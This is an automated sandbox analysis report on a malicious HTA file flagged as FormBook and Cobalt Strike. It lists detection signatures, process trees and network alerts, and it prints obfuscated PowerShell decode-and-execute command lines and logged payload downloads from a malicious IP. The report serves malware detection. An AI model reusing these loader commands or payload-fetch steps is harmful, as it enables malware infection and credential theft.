Windows Analysis Report
seemebestgoodluckthings.hta

Overview

General Information

Sample name: seemebestgoodluckthings.hta
Analysis ID: 1566470
MD5: 46792b4c6325dfcc5943fb8912b50bcd
SHA1: b20380592ee042e7d232d4946e63cb5559cb0eda
SHA256: 18a4b2fda9e31862ce0af8003ed1d5ab843d99f25e9e4fd5fb9f328c5cf0d5e6
Tags: htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6592 cmdline: mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6020 cmdline: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3300 cmdline: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 4412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 3192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 772 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = '[base64 payload omitted]';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_compiler.exe (PID: 3512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
seemebestgoodluckthings.hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: powershell.exe PID: 6592 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
12.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
12.2.aspnet_compiler.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
12.2.aspnet_compiler.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
12.2.aspnet_compiler.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source | Rule | Description | Author | Strings
amsi32_6592.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_6592.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = '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';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = '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
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 772, ProcessName: wscript.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 772, ProcessName: wscript.exe
                  Source: Process started, Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6592, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3512, ProcessName: aspnet_compiler.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", ProcessId: 4412, ProcessName: csc.exe
                  Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3300, TargetFilename: C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 772, ProcessName: wscript.exe
                  Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3300, TargetFilename: C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))", CommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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

                  Data Obfuscation

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3300, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline", ProcessId: 4412, ProcessName: csc.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-02T09:18:17.834280+0100 | 2049038 | 1 | A Network Trojan was detected | 142.215.209.77 | 443 | 192.168.2.4 | 49733 | TCP
                  2024-12-02T09:18:06.576394+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 172.245.123.12 | 80 | TCP

                  AV Detection

                  Source: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c, Avira URL Cloud: Label: malware
                  Source: seemebestgoodluckthings.hta, ReversingLabs: Detection: 15%
                  Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

                  Phishing

                  Source: Yara match, File source: seemebestgoodluckthings.hta, type: SAMPLE
                  Source: unknown, HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.pdb source: powershell.exe, 00000003.00000002.1813925745.000000000502D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1812401473.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  Source: Network traffic, Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49732 -> 172.245.123.12:80
                  Source: Network traffic, Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.4:49733
                  Source: global traffic, HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1 | Host: 1016.filemail.com | Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1 | Host: 172.245.123.12 | Connection: Keep-Alive
                  Source: Joe Sandbox View, IP Address: 142.215.209.77
                  Source: Joe Sandbox View, ASN Name: HUMBER-COLLEGECA
                  Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global traffic, HTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 172.245.123.12 | Connection: Keep-Alive
                  Source: unknown, TCP traffic detected without corresponding DNS query: 172.245.123.12
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C97A18 URLDownloadToFileW,3_2_00C97A18
                  Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1 Host: 1016.filemail.com Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 172.245.123.12 Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1 Host: 172.245.123.12 Connection: Keep-Alive
                  Source: global traffic DNS traffic detected: DNS query: 1016.filemail.com
                  Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknown HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.4:49733 version: TLS 1.2

                  E-Banking Fraud

                  Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = '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';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0042BDA3 NtClose,12_2_0042BDA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22B60 NtClose,LdrInitializeThunk,12_2_01A22B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_01A22DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_01A22C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A235C0 NtCreateMutant,LdrInitializeThunk,12_2_01A235C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A24340 NtSetContextThread,12_2_01A24340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A24650 NtSuspendThread,12_2_01A24650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22BA0 NtEnumerateValueKey,12_2_01A22BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22B80 NtQueryInformationFile,12_2_01A22B80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22BE0 NtQueryValueKey,12_2_01A22BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22BF0 NtAllocateVirtualMemory,12_2_01A22BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22AB0 NtWaitForSingleObject,12_2_01A22AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22AF0 NtWriteFile,12_2_01A22AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22AD0 NtReadFile,12_2_01A22AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22DB0 NtEnumerateKey,12_2_01A22DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22DD0 NtDelayExecution,12_2_01A22DD0
